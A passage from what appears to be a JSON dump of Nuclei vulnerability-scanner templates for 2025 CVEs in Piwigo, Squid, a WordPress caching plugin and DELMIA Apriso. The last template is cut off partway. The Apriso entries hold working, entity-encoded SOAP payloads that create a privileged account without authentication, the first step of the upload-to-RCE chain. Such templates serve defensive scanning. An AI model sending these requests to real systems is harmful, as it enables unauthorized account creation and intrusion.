remediation: |\n    Update to the latest version when available or apply mitigations to unify response messages.\n  reference:\n    - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2025-62512\n    epss-score: 0.00766\n    epss-percentile: 0.54014\n    cwe-id: CWE-204\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: piwigo\n    product: piwigo\n    shodan-query: http.html:\"Piwigo\"\n    fofa-query: body=\"Piwigo\"\n  tags: cve,cve2025,piwigo,user-enum,exposure\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /password.php HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        group: 1\n        regex:\n          - 'name=\"pwg_token\"\\s+value=\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /password.php?action=lost HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        pwg_token={{token}}&username_or_email=nonexistent-{{rand_int(10000,99999)}}@example.com&submit=Change+my+password\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Invalid username or email\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220252f84fa3618cc3ab3c078621eaaf44abd733c00cf49cbdf08ac66561068d3ef022068f1e6eebc92bc4ea999cbae455bb8584dba6bf154f1f740298a1c1201b2b142:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-62512.yaml","vuln_id":"cve-2025-62512"},{"raw":"id: CVE-2025-62168\n\ninfo:\n  name: Squid Proxy - HTTP Authentication Credentials Disclosure\n  author: xtr0nix\n  severity: critical\n  description: |\n    Squid versions prior to 7.2 fail to redact HTTP authentication credentials in error page responses. The Authorization header value is embedded in plain text inside the mailto: diagnostic block when Squid generates an error page (e.g. ERR_DNS_FAIL).\n  impact: |\n    Attackers can extract tokens and credentials used by trusted clients or backend applications proxied through Squid.\n  remediation: |\n    Update to the version 7.2+ or disable debug information in administrator mailto links generated by Squid by configuring squid.conf with email_err_data off.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-62168\n    - https://github.com/squid-cache/squid/security/advisories/GHSA-c8cc-phh7-xmxr\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 10.0\n    cve-id: CVE-2025-62168\n    epss-score: 0.6336\n    epss-percentile: 0.99171\n    cwe-id: CWE-209\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2025,info-disclosure,squid,proxy\n\nvariables:\n  token: \"{{randstr}}\"\n  invalid_host: \"{{rand_base(16)}}.invalid\"\n\nhttp:\n  - raw:\n      - |+\n        GET http://{{invalid_host}}/ HTTP/1.1\n        Host: {{invalid_host}}\n        Authorization: Bearer {{token}}\n\n    unsafe: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 503'\n          - 'contains(body, \"mailto:\")'\n          - 'contains(body, \"ERR_DNS_FAIL\")'\n          - 'contains(body, \"{{token}}\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        name: leaked-token\n        regex:\n          - \"Authorization%3A%20Bearer%20([^%]+)\"\n# digest: 4b0a00483046022100b8c0bae9dc389e63e4fc46d4d563441a0f1814f537bf573d260b913794729ea1022100b85b0df60a0841fd03082158177ca6e629fa2e2b99da852ce26974c982b5941b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-62168.yaml","vuln_id":"cve-2025-62168"},{"raw":"id: CVE-2025-62126\n\ninfo:\n  name: WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure\n  author: pussycat0x\n  severity: medium\n  description: |\n    Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted requests.\n  remediation: |\n    Update to the latest version beyond 1.8.3.\n  impact: |\n    Attackers can retrieve embedded sensitive information, potentially leading to data leakage.\n  reference:\n    - https://github.com/razvanstanga/varnish-caching-wordpress-plugin/pull/15\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vcaching/varnishnginx-proxy-caching-183-unauthenticated-information-exposure\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-62126\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2025-62126\n    epss-score: 0.00721\n    epss-percentile: 0.52483\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: razvanstanga\n    product: varnish-caching-wordpress-plugin\n    framework: wordpress\n  tags: cve,cve2025,wordpress,wp,wp-plugin,vcaching,exposure\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=varnish_caching_download&option_page=varnish_caching_download&varnish_caching_varnish_version=4\n\n    matchers-condition: and\n    matchers:\n      - type: binary\n        part: body\n        binary:\n          - \"504b0304\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/zip\"\n          - \"application/octet-stream\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: filename\n        part: header\n        group: 1\n        regex:\n          - 'filename=\"?([^\";\\r\\n]+)'\n# digest: 4b0a00483046022100b9f0d3a91aa9857ca43a27b95175549b43e479caa267a45eab70986ce663b5cb022100db9fd2e5b8edd1fe46b92ca5ae66237c1b6d97b6ebf4e1237c81ab62cb645750:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-62126.yaml","vuln_id":"cve-2025-62126"},{"raw":"id: CVE-2025-6205\n\ninfo:\n  name: DELMIA Apriso - Broken Access Control\n  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch\n  severity: high\n  description: |\n    DELMIA Apriso Release 2020 through Release 2025 contains a broken access control vulnerability caused by missing authorization, letting attackers gain privileged access to the application, exploit requires no special conditions.\n  remediation: |\n    Apply security patches from DELMIA for Release 2020 through Release 2025 to address missing authorization checks on message processing endpoints.\n  impact: |\n    Unauthenticated attackers can create privileged user accounts with production access through missing authorization checks on the message processing endpoint.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6205\n    - https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6205\n    - https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso\n  classification:\n    cvss-metrics: \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\"\n    cvss-score: 8.8\n    cve-id: CVE-2025-6205\n    epss-score: 0.73308\n    epss-percentile: 0.99437\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: title:\"DELMIA Apriso\"\n  tags: cve,cve2025,delmia,apriso,unauth,intrusive,vuln,kev,vkev\n\nvariables:\n  username: \"LAST\"\n  password: \"9\"\n\nhttp:\n  - raw:\n      - |\n        POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml;charset=utf-8\n        Soapaction: \"http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2\"\n\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n        xmlns:tem=\"http://tempuri.org/\">\n            <soapenv:Header/>\n            <soapenv:Body>\n                <tem:ProcessMessageASync_v2>\n                    <tem:xmlMessage>&lt;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&#32;&#120;&#109;&#108;&#110;&#115;&#58;&#120;&#115;&#105;&#61;&quot;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#119;&#51;&#46;&#111;&#114;&#103;&#47;&#50;&#48;&#48;&#49;&#47;&#88;&#77;&#76;&#83;&#99;&#104;&#101;&#109;&#97;&#45;&#105;&#110;&#115;&#116;&#97;&#110;&#99;&#101;&quot;&#32;&#120;&#115;&#105;&#58;&#110;&#111;&#78;&#97;&#109;&#101;&#115;&#112;&#97;&#99;&#101;&#83;&#99;&#104;&#101;&#109;&#97;&#76;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&#61;&quot;&#83;&#58;&#47;&#83;&#99;&#104;&#101;&#109;&#97;&#82;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#47;&#88;&#77;&#76;&#83;&#99;&#104;&#101;&#109;&#97;&#115;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&#46;&#120;&#115;&#100;&quot;&#32;&#86;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&quot;&#49;&#46;&#48;&quot;&gt;&#13;&#10;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#71;&#105;&#118;&#101;&#110;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#71;&#105;&#118;&#101;&#110;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#70;&#97;&#109;&#105;&#108;&#121;&#78;&#97;&#109;&#101;&gt;&#76;&#65;&#83;&#84;&lt;&#47;&#70;&#97;&#109;&#105;&#108;&#121;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#78;&#111;&gt;&#48;&#56;&#50;&#54;&#50;&#48;&#48;&#52;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#78;&#111;&gt;&#13;&#10;&#9;&#9;&lt;&#76;&#111;&#103;&#105;&#110;&#78;&#97;&#109;&#101;&gt;{{username}}&lt;&#47;&#76;&#111;&#103;&#105;&#110;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&gt;{{password}}&lt;&#47;&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&gt;&#13;&#10;&#9;&#9;&lt;&#72;&#105;&#114;&#101;&#68;&#97;&#116;&#101;&gt;&#50;&#48;&#48;&#48;&#45;&#48;&#54;&#45;&#48;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#72;&#105;&#114;&#101;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#83;&#112;&#111;&#107;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#49;&#48;&#51;&#51;&lt;&#47;&#83;&#112;&#111;&#107;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#87;&#114;&#105;&#116;&#116;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#49;&#48;&#51;&#51;&lt;&#47;&#87;&#114;&#105;&#116;&#116;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#86;&#97;&#108;&#105;&#100;&#68;&#97;&#116;&#101;&gt;&#50;&#48;&#48;&#48;&#45;&#48;&#54;&#45;&#48;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#86;&#97;&#108;&#105;&#100;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#76;&#111;&#103;&#105;&#110;&#69;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;&#68;&#97;&#116;&#101;&gt;&#57;&#57;&#57;&#57;&#45;&#49;&#50;&#45;&#51;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#76;&#111;&#103;&#105;&#110;&#69;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#84;&#121;&#112;&#101;&gt;&#48;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#84;&#121;&#112;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#70;&#97;&#99;&#105;&#108;&#105;&#116;&#121;&gt;&#67;&#49;&#80;&#49;&lt;&#47;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#70;&#97;&#99;&#105;&#108;&#105;&#116;&#121;&gt;&#13;&#10;&#9;&#9;&lt;&#84;&#114;&#97;&#99;&#107;&#76;&#97;&#98;&#111;&#114;&#70;&#108;&#97;&#103;&gt;&#116;&#114;&#117;&#101;&lt;&#47;&#84;&#114;&#97;&#99;&#107;&#76;&#97;&#98;&#111;&#114;&#70;&#108;&#97;&#103;&gt;&#13;&#10;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#95;&#73;&#110;&#115;&#101;&#114;&#116;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#84;&#121;&#112;&#101;&gt;&#49;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#84;&#121;&#112;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#70;&#85;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&#47;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#95;&#73;&#110;&#115;&#101;&#114;&#116;&gt;&#13;&#10;&#9;&#9;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&#47;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&gt;&#80;&#114;&#111;&#100;&#117;&#99;&#116;&#105;&#111;&#110;&#32;&#85;&#115;&#101;&#114;&lt;&#47;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#47;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#47;&#82;&#111;&#108;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&gt;&#13;&#10;&lt;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&gt;</tem:xmlMessage>\n                    <tem:applicationName>myExternalApplication</tem:applicationName>\n                </tem:ProcessMessageASync_v2>\n            </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ProcessMessageASync_v2Response\n          - <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"Username: \"+ username'\n          - '\"Password: \"+ password'\n# digest: 490a00463044022076197dde2e50bdf3ae76503b3fae43055da8ec18c8f51bc7b4b004d22cf82c9d0220608a1aad6329db5450eae43f9dfaf08f1604415fe2ed0b3ef770fca44d87421d:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-6205.yaml","vuln_id":"cve-2025-6205"},{"raw":"id: CVE-2025-6204\n\ninfo:\n  name: DELMIA Apriso - Command Injection\n  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch\n  severity: critical\n  description: |\n    An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.\n  remediation: |\n    Apply security patches from DELMIA for Release 2020 through Release 2025 to implement proper file upload validation and path canonicalization.\n  impact: |\n    Authenticated attackers can upload executable files through path traversal to achieve remote code execution on DELMIA Apriso servers.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6204\n    - https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204\n    - https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso\n  metadata:\n    verified: true\n    max-request: 5\n    shodan-query: title:\"DELMIA Apriso\"\n  classification:\n    cve-id: CVE-2025-6204\n    epss-score: 0.77957\n    epss-percentile: 0.99551\n    cwe-id: CWE-94\n    cvss-metrics: \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\"\n    cvss-score: 9.0\n  tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive,vuln,kev,vkev\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5)\n\nvariables:\n  filename: \"{{randbase(5)}}\"\n  username: \"LAST\"\n  password: \"9\"\n\nhttp:\n  - raw:\n      - |-\n        POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml;charset=utf-8\n        Soapaction: \"http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2\"\n\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n        xmlns:tem=\"http://tempuri.org/\">\n            <soapenv:Header/>\n            <soapenv:Body>\n                <tem:ProcessMessageASync_v2>\n                    <tem:xmlMessage>&lt;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&#32;&#120;&#109;&#108;&#110;&#115;&#58;&#120;&#115;&#105;&#61;&quot;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#119;&#51;&#46;&#111;&#114;&#103;&#47;&#50;&#48;&#48;&#49;&#47;&#88;&#77;&#76;&#83;&#99;&#104;&#101;&#109;&#97;&#45;&#105;&#110;&#115;&#116;&#97;&#110;&#99;&#101;&quot;&#32;&#120;&#115;&#105;&#58;&#110;&#111;&#78;&#97;&#109;&#101;&#115;&#112;&#97;&#99;&#101;&#83;&#99;&#104;&#101;&#109;&#97;&#76;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&#61;&quot;&#83;&#58;&#47;&#83;&#99;&#104;&#101;&#109;&#97;&#82;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#47;&#88;&#77;&#76;&#83;&#99;&#104;&#101;&#109;&#97;&#115;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&#46;&#120;&#115;&#100;&quot;&#32;&#86;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&quot;&#49;&#46;&#48;&quot;&gt;&#13;&#10;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#71;&#105;&#118;&#101;&#110;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#71;&#105;&#118;&#101;&#110;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#70;&#97;&#109;&#105;&#108;&#121;&#78;&#97;&#109;&#101;&gt;&#76;&#65;&#83;&#84;&lt;&#47;&#70;&#97;&#109;&#105;&#108;&#121;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#78;&#111;&gt;&#48;&#56;&#50;&#54;&#50;&#48;&#48;&#52;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#78;&#111;&gt;&#13;&#10;&#9;&#9;&lt;&#76;&#111;&#103;&#105;&#110;&#78;&#97;&#109;&#101;&gt;{{username}}&lt;&#47;&#76;&#111;&#103;&#105;&#110;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&gt;{{password}}&lt;&#47;&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&gt;&#13;&#10;&#9;&#9;&lt;&#72;&#105;&#114;&#101;&#68;&#97;&#116;&#101;&gt;&#50;&#48;&#48;&#48;&#45;&#48;&#54;&#45;&#48;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#72;&#105;&#114;&#101;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#83;&#112;&#111;&#107;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#49;&#48;&#51;&#51;&lt;&#47;&#83;&#112;&#111;&#107;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#87;&#114;&#105;&#116;&#116;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#49;&#48;&#51;&#51;&lt;&#47;&#87;&#114;&#105;&#116;&#116;&#101;&#110;&#76;&#97;&#110;&#103;&#117;&#97;&#103;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#86;&#97;&#108;&#105;&#100;&#68;&#97;&#116;&#101;&gt;&#50;&#48;&#48;&#48;&#45;&#48;&#54;&#45;&#48;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#86;&#97;&#108;&#105;&#100;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#76;&#111;&#103;&#105;&#110;&#69;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;&#68;&#97;&#116;&#101;&gt;&#57;&#57;&#57;&#57;&#45;&#49;&#50;&#45;&#51;&#49;&#84;&#48;&#48;&#58;&#48;&#48;&#58;&#48;&#48;&lt;&#47;&#76;&#111;&#103;&#105;&#110;&#69;&#120;&#112;&#105;&#114;&#97;&#116;&#105;&#111;&#110;&#68;&#97;&#116;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#84;&#121;&#112;&#101;&gt;&#48;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#84;&#121;&#112;&#101;&gt;&#13;&#10;&#9;&#9;&lt;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#70;&#97;&#99;&#105;&#108;&#105;&#116;&#121;&gt;&#67;&#49;&#80;&#49;&lt;&#47;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#70;&#97;&#99;&#105;&#108;&#105;&#116;&#121;&gt;&#13;&#10;&#9;&#9;&lt;&#84;&#114;&#97;&#99;&#107;&#76;&#97;&#98;&#111;&#114;&#70;&#108;&#97;&#103;&gt;&#116;&#114;&#117;&#101;&lt;&#47;&#84;&#114;&#97;&#99;&#107;&#76;&#97;&#98;&#111;&#114;&#70;&#108;&#97;&#103;&gt;&#13;&#10;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#95;&#73;&#110;&#115;&#101;&#114;&#116;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#78;&#97;&#109;&#101;&gt;&#70;&#73;&#82;&#83;&#84;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#78;&#97;&#109;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#84;&#121;&#112;&#101;&gt;&#49;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#84;&#121;&#112;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#70;&#85;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&#47;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#95;&#73;&#110;&#115;&#101;&#114;&#116;&gt;&#13;&#10;&#9;&#9;&lt;&#47;&#82;&#101;&#115;&#111;&#117;&#114;&#99;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&#47;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&#73;&#68;&#32;&#78;&#111;&#100;&#101;&#84;&#121;&#112;&#101;&#61;&quot;&#70;&#105;&#101;&#108;&#100;&quot;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&#9;&lt;&#82;&#111;&#108;&#101;&gt;&#80;&#114;&#111;&#100;&#117;&#99;&#116;&#105;&#111;&#110;&#32;&#85;&#115;&#101;&#114;&lt;&#47;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&#9;&lt;&#47;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&#9;&#9;&lt;&#47;&#82;&#111;&#108;&#101;&#73;&#68;&gt;&#13;&#10;&#9;&#9;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#82;&#111;&#108;&#101;&gt;&#13;&#10;&#9;&lt;&#47;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&gt;&#13;&#10;&lt;&#47;&#70;&#108;&#101;&#120;&#78;&#101;&#116;&#95;&#69;&#109;&#112;&#108;&#111;&#121;&#101;&#101;&#115;&gt;</tem:xmlMessage>\n                    <tem:applicationName>myExternalApplication</tem:applicationName>\n                </tem:ProcessMessageASync_v2>\n            </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ProcessMessageASync_v2Response\n          - <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>\n        condition: and\n        internal: true\n\n\n  - raw:\n      - |\n        GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: 